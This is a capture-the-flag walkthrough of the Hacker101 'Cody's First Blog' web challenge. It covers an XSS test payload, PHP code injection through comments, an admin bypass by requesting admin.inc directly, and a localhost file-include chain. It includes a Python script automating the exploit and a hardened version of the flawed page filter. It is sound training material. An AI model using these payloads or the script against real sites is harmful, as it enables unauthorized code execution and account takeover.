CTF — Hacker101 — Cody’s First Blog

Ravid Mazon
CyberX

--

So this one took me a while, as I was trying to solve it in an “overthinking” way before realizing it's not that complicated.

Moderate level, web, here we go.

FLAG0

So for the first flag, I tried a bunch of things without success.

After taking the hints, I realized this is about the first input, which was the comment box.

I started submitting some payloads like <img src=x onerror=alert(hacked)> and found that the comment was submitted and held for approval (a hint for the next one: *umm*, admin).

Knowing that the platform, in this case, is PHP, I figured “why not try to inject some PHP code?” I tried it and got my flag! The comment is stored unapproved, so nothing runs yet; the flag here only rewards the idea that the comment body will eventually be treated as PHP.

some PHP code

FLAG1

I started looking for something to work with.

I guess looking at the source code of the index page wouldn't hurt.

Opened the source and found a suspicious HTML comment containing a link to the admin page, which was worth checking for sure.

page=admin.auth.inc

Going to this link, indeed I reached the admin login page.

Admin login page

At this point I tried logging in with a bunch of default credentials, without success. Also, thinking the web server was Nginx (the 403 page further down actually says Apache), I looked for a file containing credentials or the defaults and couldn't find one.

Moreover, running gobuster turned up a few surprises:

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/php.ini (Status: 200)
/posts (Status: 301)
/server-status (Status: 403)

I looked through php.ini (the PHP configuration file, served here with a 200) without finding anything I could work with.

I also tried reaching /.htpasswd to see if I could get something from it.

403 — as expected.

As expected I got 403 Forbidden, but the interesting part is the server footer: Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 54597

The footer leaks the port the backend is listening on. A quick Nmap check showed it as open, so I tried connecting to the server directly.

Again, no success here. Going back to the index page I saw that “Cody” wrote “This server can’t talk to the outside world and nobody but me can upload files”, so I guess I can't connect from outside.

Feeling a little frustrated at this point, I tried several more things, like brute-forcing the login page to get in as admin. Since I had neither the username nor the password it was a very hard task, and I thought to myself that there must be an easier way.

I looked at the URL, and the part that caught my eye was the admin link itself: “page=admin.auth.inc”.

Everyone knows you have to authenticate before you can log in, so I wondered what would happen if the authentication step were simply skipped: could I reach the admin page directly?

I removed the auth part, requested “page=admin.inc”, and BAM! Not only did I get my flag, I was also admin now, which means I can approve comments. That must be useful for the next flag! The `page` parameter names the `.inc` file the application loads, and nothing on the server checks that the login wrapper (admin.auth.inc) ever ran before serving admin.inc, so the “authentication” is just a different file name in the URL.

Admin power

FLAG2

So, let's sum up what we know so far:

  1. we can write some PHP code and submit it as a comment
  2. we can approve it as admin

and now we need to get it executed.

As we already know, “This server can’t talk to the outside world”, so instead of pointing the include at an external host, let's point it back at the box itself.

By going to ?page=http://localhost/index I could see that the comments I had approved before were executed. The page filter in index.php (dumped below) only resets values that contain a colon and do not start with “http:”, so a URL back to localhost passes straight through, and the approved comment bodies get interpreted as PHP when that copy of the page is included.

Our little PHP injection (server-side, not XSS)

I tried a few pieces of code until I got the right one.

Using a payload that reads index.php I was able to get the third flag (FLAG2).

PoC:

Submitting a comment to read the index.php

After approving the comment and reloading “localhost/index”, the developer tools (F12) showed that my PHP code had executed as expected, with the third flag in the output. The flag sits in a PHP comment inside index.php, so you have to look at the raw response rather than the rendered page.
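The chain above (submit a PHP comment, approve it as admin, trigger it through the localhost include) as a standard-library script. This is an added example, not the author's script or anything shipped with the challenge. Assumptions: BASE_URL is the instance address; the comment form posts a field named `body` (that name is confirmed by the index.php dump); the approval step is done by hand in ?page=admin.inc because the approve form is not shown on the page; the flag token format `^FLAG^...$FLAG$` is taken from the dump.

```python
"""Drive the FLAG2 chain against a Cody's First Blog instance (added example).

Only urllib is used so the script runs without extra packages. The approval
step is manual: the script pauses until you have approved the comment.
"""
import re
import sys
import urllib.parse
import urllib.request

BASE_URL = "http://localhost:54597"  # assumption: replace with the instance URL

# Flag token format taken from the index.php dump: ^FLAG^<value>$FLAG$
FLAG_RE = re.compile(r"\^FLAG\^[^$\s<]+\$FLAG\$")


def build_payload(path="index.php"):
    """PHP that dumps a server-side file inside <pre> so the PHP comments in
    it (where the flag lives) survive rendering and are easy to spot."""
    return ("<?php echo '<pre>' . htmlspecialchars(file_get_contents('%s'))"
            " . '</pre>'; ?>" % path)


def build_url(page):
    """URL for a given `page` value; urlencode takes care of the :// in the
    localhost include so the query string stays well formed."""
    return BASE_URL + "/?" + urllib.parse.urlencode({"page": page})


def extract_flags(html):
    """Return every ^FLAG^...$FLAG$ token in a response body, in order."""
    return FLAG_RE.findall(html)


def post_comment(body):
    """Submit `body` as a comment on the front page (stored with approved=0).
    The response already contains FLAG1 when the body holds '<?php'."""
    data = urllib.parse.urlencode({"body": body}).encode()
    req = urllib.request.Request(BASE_URL + "/", data=data)
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode(errors="replace")


def fetch(page):
    """GET ?page=<page> and return the body as text."""
    with urllib.request.urlopen(build_url(page)) as resp:
        return resp.read().decode(errors="replace")


def main():
    submit_html = post_comment(build_payload("index.php"))
    print("Comment submitted. Flags in the submit response:",
          extract_flags(submit_html) or "none")
    print("Approve the comment in ?page=admin.inc, then press Enter.")
    input()
    # The remote include points the server back at itself, so the approved
    # comment is rendered and executed as PHP in that copy of the page.
    trigger_html = fetch("http://localhost/index")
    flags = extract_flags(trigger_html)
    print("\n".join(flags) if flags else "no flag found; check the raw response")
    return 0 if flags else 1


if __name__ == "__main__":
    sys.exit(main())
```

The payload wraps the file in `<pre>` and escapes it, because the flag is inside a PHP comment and a raw `<?php ... ?>` block would be hidden by the browser; with the escaping, the flag is visible in the rendered page as well as in the source.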

<?php
// ^FLAG^{FLAG2}$FLAG$
mysql_connect("localhost", "root", "");
mysql_select_db("level4");
$page = isset($_GET['page']) ? $_GET['page'] : 'home.inc';
if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:")
    $page = "home.inc";

if(isset($_POST['body'])) {
    mysql_query("INSERT INTO comments (page, body, approved) VALUES ('" . mysql_real_escape_string($page) . "', '" . mysql_real_escape_string($_POST['body']) . "', 0)");
    if(strpos($_POST['body'], '<?php') !== false)
        echo '<p>^FLAG^{FLAG1}$FLAG$</p>';
?>
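The `page` check in that dump is the root of both the admin.inc trick and the localhost include, so here is a Python port of it next to a hardened version. This is an added example, not code from the challenge: the PHP semantics of strpos/substr are re-implemented so the behaviour can be checked offline, and the allowlist in the hardened version (which `.inc` names exist, and that admin.inc requires a logged-in session) is a design choice of this example; the only thing taken from the page is the two file names.

```python
"""Port of the page filter from Cody's index.php, beside a hardened version
(added example). Assumption: the filtered value ends up in an include(),
which is what makes a bad value dangerous."""

PHP_HOME = "home.inc"


def php_filter(page):
    """Mirror the original check:
        if(strpos($page, ':') !== false && substr($page, 0, 5) !== "http:")
            $page = "home.inc";
    Any value without a colon passes untouched (admin.inc, ../etc/passwd),
    and so does anything that starts with "http:". Only other schemes such
    as ftp: or data: are reset to the home page."""
    if page is None:                      # no ?page= parameter at all
        return PHP_HOME
    if ":" in page and page[:5] != "http:":
        return PHP_HOME
    return page


# Allowlist of the pages the application ships (names from the page; the
# table itself is this example's design). The request names a key, never a file.
ALLOWED_PAGES = {
    "home": "home.inc",
    "admin": "admin.auth.inc",   # login gate; admin.inc is only reachable after auth
}


def hardened_filter(page, authenticated=False):
    """Resolve `page` through a fixed table instead of trusting the string.
    Unknown keys fall back to home, so neither admin.inc (direct include)
    nor http://localhost/index (remote include) can be named by the client,
    and admin.inc is only chosen when the server already knows the session
    is authenticated."""
    if page is None:
        return PHP_HOME
    if page == "admin" and authenticated:
        return "admin.inc"
    return ALLOWED_PAGES.get(page, PHP_HOME)
```

The point of the hardened version is not the string comparison but the direction of the mapping: the client chooses a key and the server picks the file, so there is no string the client can send that reaches a file the table does not list.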
